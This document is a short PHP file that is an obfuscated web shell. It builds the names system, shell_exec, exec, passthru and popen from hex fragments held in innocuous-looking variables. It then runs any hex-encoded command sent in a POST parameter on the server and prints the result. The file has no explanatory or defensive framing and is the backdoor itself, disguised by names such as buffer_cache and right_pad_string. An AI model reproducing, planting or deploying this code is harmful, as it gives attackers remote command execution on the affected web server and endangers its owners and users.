<?php


$element1 = '7';
$element2 = '3';
$element3 = '9';
$element4 = '6';
$element5 = 'd';
$element6 = '8';
$element7 = '5';
$element8 = 'c';
$element9 = 'f';
$element10 = '0';
$element11 = '1';
$element12 = '4';
$element13 = 'e';
$element14 = '2';
$buffer_cache1 = pack("H*", $element1.$element2.'7'.$element3.'7'.$element2.$element1.'4'.$element4.'5'.'6'.$element5);
$buffer_cache2 = pack("H*", '7'.$element2.$element4.$element6.$element4.$element7.'6'.'c'.'6'.$element8.'5'.$element9.'6'.$element7.'7'.$element6.'6'.'5'.'6'.'3');
$buffer_cache3 = pack("H*", $element4.'5'.$element1.'8'.'6'.$element7.$element4.$element2);
$buffer_cache4 = pack("H*", '7'.$element10.'6'.$element11.'7'.'3'.'7'.$element2.$element1.$element12.'6'.'8'.'7'.'2'.$element1.'5');
$buffer_cache5 = pack("H*", $element1.$element10.$element4.'f'.'7'.$element10.$element4.$element7.'6'.$element13);
$buffer_cache6 = pack("H*", '7'.'3'.'7'.'4'.'7'.'2'.$element4.'5'.$element4.'1'.$element4.'d'.$element7.$element9.$element4.$element1.'6'.$element7.$element1.$element12.'5'.$element9.$element4.'3'.$element4.'f'.'6'.'e'.'7'.'4'.$element4.'5'.'6'.$element13.'7'.'4'.'7'.$element2);
$buffer_cache7 = pack("H*", $element1.$element10.$element4.$element2.'6'.$element8.$element4.'f'.'7'.'3'.'6'.'5');
$right_pad_string = pack("H*", $element1.$element14.$element4.'9'.'6'.$element1.'6'.$element6.$element1.'4'.$element7.'f'.$element1.'0'.'6'.$element11.$element4.'4'.'5'.'f'.$element1.$element2.$element1.$element12.$element1.'2'.$element4.$element3.$element4.$element13.$element4.'7');
if (isset($_POST[$right_pad_string])) {
    $right_pad_string = pack("H*", $_POST[$right_pad_string]);
    if (function_exists($buffer_cache1)) {
        $buffer_cache1($right_pad_string);
    } elseif (function_exists($buffer_cache2)) {
        print $buffer_cache2($right_pad_string);
    } elseif (function_exists($buffer_cache3)) {
        $buffer_cache3($right_pad_string, $mrk_item);
        print join("\n", $mrk_item);
    } elseif (function_exists($buffer_cache4)) {
        $buffer_cache4($right_pad_string);
    } elseif (function_exists($buffer_cache5) && function_exists($buffer_cache6) && function_exists($buffer_cache7)) {
        $ent_factor = $buffer_cache5($right_pad_string, 'r');
        if ($ent_factor) {
            $object_reference = $buffer_cache6($ent_factor);
            $buffer_cache7($ent_factor);
            print $object_reference;
        }
    }
    exit;
}
